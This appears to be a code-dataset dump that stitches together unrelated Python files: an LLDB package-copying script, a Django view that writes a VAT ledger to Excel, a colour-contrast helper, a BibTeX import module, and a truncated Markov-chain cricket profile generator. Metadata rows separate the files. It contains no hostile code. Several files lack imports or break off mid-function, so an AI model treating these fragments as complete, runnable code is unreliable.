# In-house modules:
import utilsOsType # Determine the OS type this script is running on
import utilsDebug # Debug Python scripts
# User facing text:
strMsgOsVersion = "The current OS is %s"
strMsgPyVersion = "The Python version is %d.%d"
strErrMsgProgFail = "Program failure: "
strErrMsgLLDBPyFileNotNotFound = "Unable to locate lldb.py at path '%s'"
strMsgCopyLLDBPy = "Copying lldb.py from '%s' to '%s'"
strErrMsgFrameWkPyDirNotExist = "Unable to find the LLDB.framework directory '%s'"
strMsgCreatePyPkgCopyPkgFile = "create_py_pkg: Copied file '%s' to folder '%s'"
strMsgCreatePyPkgInitFile = "create_py_pkg: Creating package init file '%s'"
strMsgCreatePyPkgMkDir = "create_py_pkg: Created folder '%s'"
strMsgConfigBuildDir = "Configuration build directory located at '%s'"
strMsgFoundLldbFrameWkDir = "Found '%s'"
strMsgPyFileLocatedHere = "Python file will be put in '%s'"
strMsgFrameWkPyExists = "Python output folder '%s' already exists"
strMsgFrameWkPyMkDir = "Python output folder '%s' will be created"
strErrMsgCreateFrmWkPyDirFailed = "Unable to create directory '%s' error: %s"
strMsgSymlinkExists = "Symlink for '%s' already exists"
strMsgSymlinkMk = "Creating symlink for %s (%s -> %s)"
strErrMsgCpLldbpy = "copying lldb to lldb package directory"
strErrMsgCreatePyPkgMissingSlash = "Parameter 3 fn create_py_pkg() missing slash"
strErrMsgMkLinkExecute = "Command mklink failed: %s"
strErrMsgMakeSymlink = "creating symbolic link"
strErrMsgUnexpected = "Unexpected error: %s"
strMsgCopySixPy = "Copying six.py from '%s' to '%s'"
strErrMsgCopySixPyFailed = "Unable to copy '%s' to '%s'"
#++---------------------------------------------------------------------------
# Details: Create Python packages and Python __init__ files.
# Args: vDictArgs - (R) Program input parameters.
# vstrFrameworkPythonDir - (R) Python framework directory.
# vstrPkgDir - (R) Destination for copied Python files.
# vListPkgFiles - (R) List of source Python files.
# Returns: Bool - True = function success, False = failure.
# Str - Error description on task failure.
# Throws: None.
#--
def create_py_pkg(
vDictArgs,
vstrFrameworkPythonDir,
vstrPkgDir,
vListPkgFiles):
dbg = utilsDebug.CDebugFnVerbose("Python script create_py_pkg()")
dbg.dump_object("Package file(s):", vListPkgFiles)
bDbg = "-d" in vDictArgs
bOk = True
strMsg = ""
if vstrPkgDir.__len__() != 0 and vstrPkgDir[0] != "/":
bOk = False
strMsg = strErrMsgCreatePyPkgMissingSlash
return (bOk, strMsg)
strPkgName = vstrPkgDir
strPkgName = "lldb" + strPkgName.replace("/", ".")
strPkgDir = vstrFrameworkPythonDir
strPkgDir += vstrPkgDir
strPkgDir = os.path.normcase(strPkgDir)
if not(os.path.exists(strPkgDir) and os.path.isdir(strPkgDir)):
if bDbg:
print((strMsgCreatePyPkgMkDir % strPkgDir))
os.makedirs(strPkgDir)
for strPkgFile in vListPkgFiles:
if os.path.exists(strPkgFile) and os.path.isfile(strPkgFile):
if bDbg:
print((strMsgCreatePyPkgCopyPkgFile % (strPkgFile, strPkgDir)))
shutil.copy(strPkgFile, strPkgDir)
# Create a packet init files if there wasn't one
strPkgIniFile = os.path.normpath(os.path.join(strPkgDir, "__init__.py"))
if os.path.exists(strPkgIniFile) and os.path.isfile(strPkgIniFile):
return (bOk, strMsg)
strPyScript = "__all__ = ["
strDelimiter = ""
for strPkgFile in vListPkgFiles:
if os.path.exists(strPkgFile) and os.path.isfile(strPkgFile):
strBaseName = os.path.basename(strPkgFile)
nPos = strBaseName.find(".")
if nPos != -1:
strBaseName = strBaseName[0: nPos]
strPyScript += "%s\"%s\"" % (strDelimiter, strBaseName)
strDelimiter = ","
strPyScript += "]\n"
strPyScript += "for x in __all__:\n"
strPyScript += "\t__import__('%s.' + x)" % strPkgName
if bDbg:
print((strMsgCreatePyPkgInitFile % strPkgIniFile))
file = open(strPkgIniFile, "w")
file.write(strPyScript)
file.close()
return (bOk, strMsg)
#++---------------------------------------------------------------------------
# Details: Retrieve the directory path for Python's dist_packages/
# site_package folder depending on the type of OS platform being
# used.
# Args: vDictArgs - (R) Program input parameters.
# Returns: Bool - True = function success, False = failure.
# Str - Python Framework directory path.
# strErrMsg - Error description on task failure.
# Throws: None.
#--
def get_framework_python_dir(vDictArgs):
dbg = utilsDebug.CDebugFnVerbose(
"Python script get_framework_python_dir()")
bOk = True
strErrMsg = ""
strWkDir = os.path.normpath(vDictArgs["--lldbPythonPath"])
return (bOk, strWkDir, strErrMsg)
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
""" Details: Program main entry point fn. Called by another Python script.
--------------------------------------------------------------------------
Details: This script is to be called by another Python script. It is not
             intended to be called directly, i.e. from the command line.
Args: vDictArgs - (R) Map of parameter names to values.
-d (optional) Determines whether or not this script
outputs additional information when running.
-m (optional) Specify called from Makefile system. If given locate
the LLDBWrapPython.cpp in --srcRoot/source folder
else in the --targetDir folder.
--srcRoot The root of the lldb source tree.
--targetDir Where the lldb framework/shared library gets put.
--cfgBlddir Where the buildSwigPythonLLDB.py program will
(optional) put the lldb.py file it generated from running
SWIG.
--prefix Is the root directory used to determine where
(optional) third-party modules for scripting languages should
be installed. Where non-Darwin systems want to put
the .py and .so files so that Python can find them
automatically. Python install directory.
--lldbLibDir The name of the directory containing liblldb.so.
(optional) "lib" by default.
Results: 0 Success
-100+ Error from this script to the caller script.
-100 Error program failure with optional message.
--------------------------------------------------------------------------
"""
def main(vDictArgs):
dbg = utilsDebug.CDebugFnVerbose("Python script main()")
bOk = True
strMsg = ""
strErrMsgProgFail = ""
bDbg = "-d" in vDictArgs
eOSType = utilsOsType.determine_os_type()
if bDbg:
pyVersion = sys.version_info
print((strMsgOsVersion % utilsOsType.EnumOsType.name_of(eOSType)))
print((strMsgPyVersion % (pyVersion[0], pyVersion[1])))
bOk, strFrameworkPythonDir, strMsg = get_framework_python_dir(vDictArgs)
strRoot = os.path.normpath(vDictArgs["--srcRoot"])
if bOk:
# lldb
listPkgFiles = [
os.path.join(
strRoot,
"source",
"Interpreter",
"embedded_interpreter.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "", listPkgFiles)
if bOk:
# lldb/formatters/cpp
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"synthetic",
"gnu_libstdcpp.py"),
os.path.join(
strRoot,
"examples",
"synthetic",
"libcxx.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/formatters/cpp", listPkgFiles)
if bOk:
# Make an empty __init__.py in lldb/runtime as this is required for
# Python to recognize lldb.runtime as a valid package (and hence,
# lldb.runtime.objc as a valid contained package)
listPkgFiles = []
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/runtime", listPkgFiles)
if bOk:
# lldb/formatters
# Having these files copied here ensure that lldb/formatters is a
# valid package itself
listPkgFiles = [
os.path.join(
strRoot, "examples", "summaries", "cocoa", "cache.py"), os.path.join(
strRoot, "examples", "summaries", "synth.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "metrics.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "attrib_fromdict.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "Logger.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/formatters", listPkgFiles)
if bOk:
# lldb/utils
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"symbolication.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/utils", listPkgFiles)
if bOk and (eOSType == utilsOsType.EnumOsType.Darwin):
# lldb/macosx
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"crashlog.py"),
os.path.join(
strRoot,
"examples",
"darwin",
"heap_find",
"heap.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/macosx", listPkgFiles)
if bOk and (eOSType == utilsOsType.EnumOsType.Darwin):
# lldb/diagnose
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"diagnose_unwind.py"),
os.path.join(
strRoot,
"examples",
"python",
"diagnose_nsstring.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/diagnose", listPkgFiles)
if bOk:
return (0, strMsg)
else:
strErrMsgProgFail += strMsg
return (-100, strErrMsgProgFail)
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# This script can be called by another Python script by calling the main()
# function directly
if __name__ == "__main__":
print("Script cannot be called directly, called by finishSwigWrapperClasses.py")
| apache-2.0 | 5,337,334,831,581,804,000 | 40.518072 | 99 | 0.558546 | false | 4.18712 | false | false | false |
pprofpc/generadorCalendario | xlsx.py | 1 | 7335 | # -*- coding: utf-8 -*-
#Para el excel
import xlsxwriter
try:
import cStringIO as StringIO
except ImportError:
    import StringIO
from django.http import HttpResponse
# NOTE: this view also relies on the RegistroIva model (and related models)
# being importable here; the exact import path is project-specific and is
# assumed to be provided elsewhere.
#Descarga Libro iva
def printIva(request, idIva):
iva = RegistroIva.objects.get(id=idIva)
# Create the HttpResponse object with the appropriate PDF headers.
# create a workbook in memory
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
arrayContenido = {
'border': 1,
'align': 'center',
'valign': 'vcenter'}
arrayMoney = {
'border': 1,
        'align': 'right',
'valign': 'vcenter',
'num_format': '[$$-2C0A] #.#0'}
contenidoTabla = workbook.add_format(arrayContenido)
money = workbook.add_format(arrayMoney)
def addHoja(worksheet, tipoLibro):
negrita = workbook.add_format()
negrita.set_bold()
worksheet.set_column('A:C', 15)
worksheet.set_column('D:D', 40)
worksheet.set_column('E:S', 15)
worksheet.write('A1', 'IMPRESORA DEL CENTRO S.R.L.', negrita)
worksheet.write('A2', u'DOMICILIO: JULIO CESAR LASTRA 2220 - Bº SANTA ISABEL 1º SECCIÓN - CÓRDOBA', negrita)
worksheet.write('A3', 'CUIT: 30-71103466-4', negrita)
worksheet.write('A4', 'IVA RESPONSABLE INSCRIPTO', negrita)
worksheet.write('E4', 'IVA %s' % tipoLibro, negrita)
worksheet.write('E6', 'PERIODO: ', negrita)
worksheet.write('F6', '%s' % iva.periodo(), negrita)
##CREANDO TITULOS TABLA
tituloTabla = workbook.add_format({
'border': 2,
'align': 'center',
'valign': 'vcenter'})
worksheet.merge_range('A8:A9', 'FECHA', tituloTabla)
worksheet.merge_range('B8:C8', 'COMPROBANTE', tituloTabla)
worksheet.write('B9', 'TIPO',tituloTabla)
worksheet.write('C9', u'NÚMERO',tituloTabla)
worksheet.merge_range('D8:D9', u'NOMBRE Y APELLIDO O RAZÓN SOCIAL', tituloTabla)
worksheet.merge_range('E8:E9', u'C.U.I.T.', tituloTabla)
if tipoLibro == 'COMPRAS':
worksheet.merge_range('F8:F9', u'TOTAL\nFACTURADO', tituloTabla)
worksheet.merge_range('G8:J8', u'NETO GRAVADO', tituloTabla)
worksheet.write('G9', '21%',tituloTabla)
worksheet.write('H9', '27%',tituloTabla)
worksheet.write('I9', '17,355%',tituloTabla)
worksheet.write('J9', '10,50%',tituloTabla)
worksheet.merge_range('K8:N8', u'IVA LOQUIDADO', tituloTabla)
worksheet.write('K9', '21%',tituloTabla)
worksheet.write('L9', '27%',tituloTabla)
worksheet.write('M9', '17,355%',tituloTabla)
worksheet.write('N9', '10,50%',tituloTabla)
worksheet.merge_range('O8:O9', u'COMPRAS\nFACT. C/B', tituloTabla)
worksheet.merge_range('P8:P9', u'CONCEPTO\nNO GRAV.', tituloTabla)
worksheet.merge_range('Q8:Q9', u'RETENCIÓN\nIVA', tituloTabla)
worksheet.merge_range('R8:R9', u'RETENCIÓN\nGANANCIAS', tituloTabla)
worksheet.merge_range('S8:S9', u'IMP. CTA', tituloTabla)
else:
worksheet.merge_range('F8:F9', u'COND', tituloTabla)
worksheet.merge_range('G8:G9', u'TOTAL\nFACTURA', tituloTabla)
worksheet.merge_range('H8:I8', u'NETO GRAVADO', tituloTabla)
worksheet.write('H9', '21%',tituloTabla)
worksheet.write('I9', '10,5%',tituloTabla)
worksheet.merge_range('J8:K8', u'IVA LIQUIDADO', tituloTabla)
worksheet.write('J9', '21%',tituloTabla)
worksheet.write('K9', '10,5%',tituloTabla)
worksheet.merge_range('L8:L9', u'EXENTOS', tituloTabla)
worksheet.merge_range('M8:M9', u'RETEN.', tituloTabla)
return worksheet
#CARGO LIBRO COMPRAS
compras = addHoja(workbook.add_worksheet('LIBRO IVA COMPRAS'), 'COMPRAS')
count = 10
for fc in iva.facturasCompra():
compras.write('A%d' % count, str(fc.fecha.strftime('%d/%m/%Y')),contenidoTabla)
compras.write('B%d' % count, str(fc.letra),contenidoTabla)
compras.write('C%d' % count, str(fc.numero),contenidoTabla)
compras.write('D%d' % count, str(fc.proveedor.nombre),contenidoTabla)
compras.write('E%d' % count, str(fc.proveedor.cuit),contenidoTabla)
compras.write('F%d' % count, fc.total(),money)
if (fc.iva=='21'):
compras.write('G%d' % count, fc.subtotal(),money)
else:
compras.write('G%d' % count, '',contenidoTabla)
if (fc.iva=='27'):
compras.write('H%d' % count, fc.subtotal(),money)
else:
compras.write('H%d' % count, '',contenidoTabla)
if (fc.iva=='17.355'):
compras.write('I%d' % count, fc.subtotal(),money)
else:
compras.write('I%d' % count, '',contenidoTabla)
if (fc.iva=='10.5'):
compras.write('J%d' % count, fc.subtotal(),money)
else:
compras.write('J%d' % count, '',contenidoTabla)
if (fc.iva=='21' and fc.letra=='A'):
compras.write('K%d' % count, fc.subtotal(),money)
else:
compras.write('K%d' % count, '',contenidoTabla)
if (fc.iva=='27' and fc.letra=='A'):
compras.write('L%d' % count, fc.subtotal(),money)
else:
compras.write('L%d' % count, '',contenidoTabla)
if (fc.iva=='17.355' and fc.letra=='A'):
compras.write('M%d' % count, fc.subtotal(),money)
else:
compras.write('M%d' % count, '',contenidoTabla)
if (fc.iva=='10.5' and fc.letra=='A'):
compras.write('N%d' % count, fc.subtotal(),money)
else:
compras.write('N%d' % count, '',contenidoTabla)
if (fc.letra=='B' or fc.letra=='C'):
compras.write('O%d' % count, fc.total(),money)
else:
compras.write('O%d' % count, '',contenidoTabla)
if (fc.noGravado>0):
compras.write('P%d' % count, fc.noGravado,money)
else:
compras.write('P%d' % count, '',contenidoTabla)
if (fc.retIva>0):
compras.write('Q%d' % count, fc.retIva,money)
else:
compras.write('Q%d' % count, '',contenidoTabla)
if (fc.retGanancias>0):
compras.write('R%d' % count, fc.retGanancias,money)
else:
compras.write('R%d' % count, '',contenidoTabla)
if (fc.retImpCta>0):
compras.write('S%d' % count, fc.retImpCta,money)
else:
compras.write('S%d' % count, '',contenidoTabla)
count = count + 1
#CARGO LIBRO VENTAS
ventas = addHoja(workbook.add_worksheet('LIBRO IVA VENTAS'), 'VENTAS')
factVentas = iva.facturasVenta()
workbook.close()
#Creando El response
output.seek(0)
response = HttpResponse(output.read(), mimetype="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
response['Content-Disposition'] = "attachment; filename=RegistroIva%s.xlsx" % (iva.periodo())
print response
return response
| gpl-2.0 | -4,199,780,018,633,320,400 | 40.630682 | 120 | 0.564215 | false | 2.960404 | false | false | false |
DistrictDataLabs/yellowbrick | yellowbrick/style/utils.py | 1 | 2199 | # yellowbrick.style.utils
# Utility functions for styles
#
# Author: Neal Humphrey
# Created: Wed Mar 22 12:39:35 2017 -0400
#
# Copyright (C) 2017 The scikit-yb developers
# For license information, see LICENSE.txt
#
# ID: utils.py [45268fc] [email protected] $
"""
Utility functions for styles
"""
##########################################################################
## Imports
##########################################################################
import numpy as np
def find_text_color(base_color, dark_color="black", light_color="white", coef_choice=0):
"""
Takes a background color and returns the appropriate light or dark text color.
Users can specify the dark and light text color, or accept the defaults of 'black' and 'white'
base_color: The color of the background. This must be
specified in RGBA with values between 0 and 1 (note, this is the default
return value format of a call to base_color = cmap(number) to get the
color corresponding to a desired number). Note, the value of `A` in RGBA
is not considered in determining light/dark.
dark_color: Any valid matplotlib color value.
Function will return this value if the text should be colored dark
light_color: Any valid matplotlib color value.
                Function will return this value if the text should be colored light.
coef_choice: slightly different approaches to calculating brightness. Currently two options in
a list, user can enter 0 or 1 as list index. 0 is default.
"""
# Coefficients:
# option 0: http://www.nbdtech.com/Blog/archive/2008/04/27/Calculating-the-Perceived-Brightness-of-a-Color.aspx
# option 1: http://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color
coef_options = [
np.array((0.241, 0.691, 0.068, 0)),
np.array((0.299, 0.587, 0.114, 0)),
]
coefs = coef_options[coef_choice]
rgb = np.array(base_color) * 255
brightness = np.sqrt(np.dot(coefs, rgb ** 2))
# Threshold from option 0 link; determined by trial and error.
# base is light
if brightness > 130:
return dark_color
return light_color
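# Illustrative usage (sketch; any RGBA tuple with components in [0, 1] works):
#   find_text_color((0.1, 0.1, 0.1, 1.0))  ->  "white" (dark background)
#   find_text_color((0.9, 0.9, 0.8, 1.0))  ->  "black" (light background)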
| apache-2.0 | 9,137,326,317,813,900,000 | 35.65 | 115 | 0.644384 | false | 3.919786 | false | false | false |
mediatum/mediatum | schema/bibtex.py | 1 | 15854 | # coding=utf8
"""
mediatum - a multimedia content repository
Copyright (C) 2008 Matthias Kramm <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
""" We want to parse even badly broken bibtex files, no longer adhering to
the "official" bibtex grammar. In particular, we need to handle
curly brace misleveling, missing quotation marks, missing attributes,
missing ids, etc.
Hence, we don't use a lex+yacc approach but rather a heuristic approach,
which extracts records from the source file only by looking into
"@doctype" records and "field = " fields, ignoring all in between (and
not dealing with curly braces at all)
"""
import re
import os
import shutil
import sys
import codecs
import logging
import unicodedata
import time
from bibtexparser import load as bibtex_load
from bibtexparser.bparser import BibTexParser
import bibtexparser.customization
from core import db, Node
from .schema import Metadatatype
import core.users as users
from contenttypes import Directory
from contenttypes.document import Document
from utils.utils import u, u2, utf8_decode_escape
from utils.date import parse_date
q = db.query
logg = logging.getLogger(__name__)
ESCAPE_BIBTEX_KEY = False
def normchar(char_descriptor):
return unicodedata.lookup(char_descriptor).lower()
din5007_variant2_translation = [
[normchar('LATIN CAPITAL LETTER A WITH DIAERESIS'), 'ae'], # Auml
[normchar('LATIN CAPITAL LETTER O WITH DIAERESIS'), 'oe'], # Ouml
[normchar('LATIN CAPITAL LETTER U WITH DIAERESIS'), 'ue'], # Uuml
[normchar('LATIN SMALL LETTER A WITH DIAERESIS'), 'ae'], # auml
[normchar('LATIN SMALL LETTER O WITH DIAERESIS'), 'oe'], # ouml
[normchar('LATIN SMALL LETTER U WITH DIAERESIS'), 'ue'], # uuml
[normchar('LATIN SMALL LETTER SHARP S'), 'ss'], # szlig
[normchar('LATIN SMALL LETTER E WITH GRAVE'), 'e'], # egrave
[normchar('LATIN SMALL LETTER E WITH ACUTE'), 'e'], # eacute
]
d_escape = dict(din5007_variant2_translation)
def escape_bibtexkey(s, default_char="_"):
import string
res = ""
for c in s:
if c in string.ascii_letters + string.digits + "-_+:":
res = res + c
continue
elif c in d_escape:
res = res + d_escape[c]
else:
res = res + default_char
return res
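# Illustrative behaviour (sketch, not part of the original module):
#   escape_bibtexkey(u"Müller, 2009")  ->  u"Mueller__2009"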
token = re.compile(r'@\w+\s*{\s*|[a-zA-Z-_]+\s*=\s*{?["\'{]|[a-zA-Z-]+\s*=\s+[0-9a-zA-Z_]')
comment = re.compile(r'%[^\n]*\n')
delim = re.compile(r'\W')
delim2 = re.compile(r'^(?u)\s*[\w+_\-\:]*\s*\,')
frontgarbage = re.compile(r'^\W*', re.UNICODE)
backgarbage = re.compile(r'[ \n\t}"\',]*$')
xspace = re.compile(r'\s+')
counterpiece = {"{": "}", '"': '"', "'": "'"}
class MissingMapping(Exception):
def __init__(self, message=""):
self.message = message
def __str__(self):
return self.message
def getNow():
import datetime
now = datetime.datetime.now().isoformat()
now = now.replace('T', '_').replace(':', '-')
now = now.split('.')[0]
return now
def save_import_file(filename):
import core.config as config
temppath = config.get("paths.tempdir")
_filename_only = filename.split(os.path.sep)[-1]
# leave following in for windows: "/" in path representation possible there
_filename_only = filename.split("/")[-1]
destname = os.path.join(temppath, "bibtex_import_saved_" + getNow() + "_" + _filename_only)
logg.info("bibtex import: going to copy/save import file %s -> %s", filename, destname)
shutil.copyfile(filename, destname)
return
article_types = [
("article", "An article from a journal or magazine.",
("author", "title", "journal", "year"),
("volume", "number", "pages", "month", "note", "key")),
("misc", "Use this type when nothing else seems appropriate.",
(),
("author", "title", "howpublished", "month", "year", "note", "key")),
("unpublished", "A document with an author and title, but not formally published. ",
("author", "title", "note"),
("month", "year", "key")),
("book", "A book with an explicit publisher. ",
("author or editor", "title", "publisher", "year"),
("volume", "series", "address", "edition", "month", "note", "key")),
("booklet", "A work that is printed and bound, but without a named publisher or sponsoring institution.",
("title",),
("author", "howpublished", "address", "month", "year", "note", "key")),
("inbook", "A part of a book, which may be a chapter and/or a range of pages. ",
("author or editor", "title", "chapter and/or pages", "publisher", "year"),
("volume", "series", "address", "edition", "month", "note", "key")),
("manual", "Technical documentation. ",
("title"),
("author", "organization", "address", "edition", "month", "year", "note", "key")),
("techreport", "A report published by a school or other institution, usually numbered within a series. ",
("author", "title", "institution", "year"),
("type", "number", "address", "month", "note", "key")),
("conference",
"An article in the proceedings of a conference. This entry is identical to the 'inproceedings' entry and is included for compatibility with another text formatting system. ",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("proceedings", " The proceedings of a conference.",
("title", "year"),
("editor", "publisher", "organization", "address", "month", "note", "key")),
("inproceedings", "An article in the proceedings of a conference. ",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("incollection", "A part of a book with its own title.",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("phdthesis", "A PhD thesis.",
("author", "title", "school", "year"),
("address", "month", "note", "key")),
("mastersthesis", "A Master's thesis.",
("author", "title", "school", "year"),
("address", "month", "note", "key"))]
from . import schema as schema
def getAllBibTeXTypes():
return [bibname for bibname, description, required, optional in article_types]
def getbibtexmappings():
bibtextypes = {}
for metatype in schema.loadTypesFromDB():
for bibtextype in metatype.get("bibtexmapping").split(";"):
if bibtextype:
metatype_name = metatype.getName()
bibtextypes[bibtextype] = bibtextypes.get(bibtextype, []) + [metatype_name]
for bibtextype in bibtextypes:
if len(bibtextypes[bibtextype]) == 1:
bibtextypes[bibtextype] = bibtextypes[bibtextype][-1]
elif len(bibtextypes[bibtextype]) > 1:
logg.error("bibtex import: ambiguous mapping for bibtex type '%s': %s - choosing last one",
bibtextype, bibtextypes[bibtextype])
bibtextypes[bibtextype] = bibtextypes[bibtextype][-1]
return bibtextypes
def checkMappings():
s = getbibtexmappings()
for bibname, description, required, optional in article_types:
if bibname not in s:
print bibname, "is not associated with any metatype"
else:
print bibname, "->", s[bibname]
def detecttype(doctype, fields):
results = []
for bibname, description, required, optional in article_types:
score = 0
if doctype.lower() == bibname.lower():
score += 120
score -= len(required)
for field in required:
if field in fields:
score += 20
for field in optional:
if field in fields:
score += 10
results += [(score, bibname)]
if not results:
# no mapping types defined
raise ValueError("no bibtex mappings defined")
score, bibname = max(results)
if score >= 30:
return bibname
else:
return None
def _bibteximport_customize(record):
"""
Sanitize bibtex records (unicode, name lists).
"""
record = bibtexparser.customization.convert_to_unicode(record)
record = bibtexparser.customization.author(record)
record = bibtexparser.customization.editor(record)
# editor function adds "ids" (s.th. like hashes), we don't need them
if record.get("editor"):
record["editor"] = list(v["name"] for v in record["editor"])
# convert author/editor lists into semicolon-separated strings
for key in ("author", "editor"):
if key in record:
record[key] = ";".join(", ".join(n for n in name.split(", ") if n.strip()) for name in record[key])
for key in ("title", "booktitle"):
if key in record:
record[key] = record[key].replace('\n', ' ')
return record
def getentries(filename):
try:
save_import_file(filename)
except IOError as e:
logg.error("bibtex import: save import file failed: {}".format(e))
raise IOError("save import file failed")
# use utf-8-sig instead of utf-8 to get rid of BOM_UTF8, which confuses bibtex parser
for encoding in ('utf-8-sig', 'utf-16', None):
try:
error = None
fi = codecs.open(filename, "r", encoding=encoding)
parser = BibTexParser(common_strings=True)
# accept also non standard records like @SCIENCEREPORT
parser.ignore_nonstandard_types = False
parser.customization = _bibteximport_customize
bibtex = bibtex_load(fi, parser=parser)
# seems to be the correct encoding, don't try other encodings
break
except Exception as e:
# check if there is a utf-encoding error, then try other encoding
            if (encoding == 'utf-8-sig' and str(e).lower().find('utf8') >= 0) or \
               (encoding == 'utf-16' and str(e).lower().find('utf-16') >= 0):
continue
error = e
break
if error:
logg.error("bibtex import: bibtexparser failed: {}".format(e))
raise ValueError("bibtexparser failed")
return bibtex.entries
def importBibTeX(infile, node=None, req=None):
user = None
if req:
try:
user = users.getUserFromRequest(req)
msg = "bibtex import: import started by user '%s'" % (user.name)
except:
msg = "bibtex import: starting import (unable to identify user)"
else:
msg = "bibtex import: starting import (%s)" % ustr(sys.argv)
logg.info(msg)
bibtextypes = getbibtexmappings()
result = []
entries = []
if isinstance(infile, list):
entries = infile
else:
node = node or Directory(utf8_decode_escape(os.path.basename(infile)))
try:
entries = getentries(infile)
except:
# XXX TODO This reports *everything* as encoding error
# XXX TODO (even things like full disk or other parsing errors).
# XXX TODO We should at least reformulate the error message,
# XXX TODO and -- even better -- only catch errors that are to be expected.
logg.error("getentries failed", exc_info=1)
msg = "bibtex import: getentries failed, import stopped (encoding error)"
logg.error(msg)
raise ValueError("bibtex_unspecified_error")
logg.info("bibtex import: %d entries", len(entries))
for count, fields in enumerate(entries):
docid_utf8 = fields["ID"]
fields[u"key"] = fields.pop("ID")
doctype = fields.pop("ENTRYTYPE")
mytype = detecttype(doctype, fields)
if mytype:
fieldnames = {}
datefields = {}
if mytype not in bibtextypes:
logg.error("bibtex mapping of bibtex type '%s' not defined - import stopped", mytype)
msg = "bibtex mapping of bibtex type '%s' not defined - import stopped" % mytype
raise MissingMapping(msg)
result += [(mytype.lower(), fields)]
metatype = bibtextypes[mytype]
# check for mask configuration
metadatatype = q(Metadatatype).filter_by(name=metatype).one()
mask = metadatatype.get_mask(u"bibtex_import") or metadatatype.get_mask(u"bibtex")
if mask:
for f in mask.all_maskitems:
try:
_bib_name = q(Node).get(f.get(u"mappingfield")).name
_mfield = q(Node).get(f.get(u"attribute"))
_med_name = _mfield.name
if _mfield.get(u"type") == u"date":
datefields[_med_name] = _mfield.get(u"valuelist")
except AttributeError as e:
msg = "bibtex import docid='{}': field error for bibtex mask for type {} and bibtex-type '{}': {}"
msg = msg.format(docid_utf8, metatype, mytype, e)
logg.error(msg)
else:
fieldnames[_bib_name] = _med_name
doc = Document(docid_utf8,schema=metatype)
for k, v in fields.items():
if k in fieldnames.keys():
k = fieldnames[k] # map bibtex name
if k in datefields.keys(): # format date field
try:
v = str(parse_date(v, datefields[k]))
# if date format does not contains '%' the valid digit of the result must not be longer than the date format
# e.g. if datefields[k] is 'yyyy' then the result v must be clipped after 4 characters
# afterwards the result is expanded again (without the invalid digits)
if datefields[k].find('%') < 0:
v = v[:len(datefields[k])]
v = str(parse_date(v, datefields[k]))
except ValueError as e:
logg.exception("bibtex exception: %s: %s", k, v)
raise ValueError("bibtex_date_error")
doc.set(k, v)
# because the bibtex import contains only a subset of the metadata defined in metadatatype,
# all other metadata are created and set to default values.
# this will be done in the same manner as if the document is loaded in editor and saved without
# any changes (required fields are not considered)
editmask = metadatatype.get_mask(u"editmask")
if editmask and hasattr(editmask, 'set_default_metadata'):
editmask.set_default_metadata(doc)
try:
node.children.append(doc)
if user:
doc.set("creator", user.login_name)
doc.set("creationtime", unicode(time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(time.time()))))
except Exception as e:
logg.exception("bibtex exception")
raise ValueError()
logg.debug("bibtex import: finished import")
print msg
return node
| gpl-3.0 | 7,457,262,981,495,890,000 | 38.242574 | 179 | 0.599218 | false | 3.879129 | false | false | false |
sujaymansingh/random_cricket_profiles | random_cricket_profiles/player_generator.py | 1 | 3275 | """Generates a player profile using markov chains!
"""
import random
import sujmarkov
from random_cricket_profiles import countries, players
class PlayerGenerator():
def __init__(self, sample_players, min_profile_length):
self.min_profile_length = min_profile_length
self.profile_markov = sujmarkov.Markov(n=3)
self.surname_markovs = {}
self.firstname_markovs = {}
for country in countries.COUNTRIES:
self.surname_markovs[country.country_id] = sujmarkov.Markov(n=4)
self.firstname_markovs[country.country_id] = sujmarkov.Markov(n=4)
for player in sample_players:
self.add_player(player)
def add_player(self, player):
for line in player.profile:
if line:
sentence = line.split(" ")
self.profile_markov.add(sentence)
country_id = player.country_id
self.surname_markovs[country_id].add(player.surname)
firstnames = player.firstnames
if firstnames:
for name in firstnames.split(" "):
if name:
self.firstname_markovs[country_id].add(name)
def generate(self, country_code=None, seed=None):
"""Returns a tuple (player, seed).
        If country_code is not passed, a random one is chosen.
seed is used to seed the random number generator.
This means that the same seed will always generate the same player.
"""
if seed is None:
seed = random.getrandbits(64)
random_ = random.Random(seed)
if country_code:
country = countries.get_country_by_code(country_code)
else:
country = random_.choice(countries.COUNTRIES)
surname_markov = self.surname_markovs[country.country_id]
surname = "".join(surname_markov.generate(random_=random_))
firstname_markov = self.firstname_markovs[country.country_id]
firstnames_as_list = []
for i in range(random_.choice([1, 2, 3])):
firstname = "".join(firstname_markov.generate(random_=random_))
firstnames_as_list.append(firstname)
firstnames = " ".join(firstnames_as_list)
profile = []
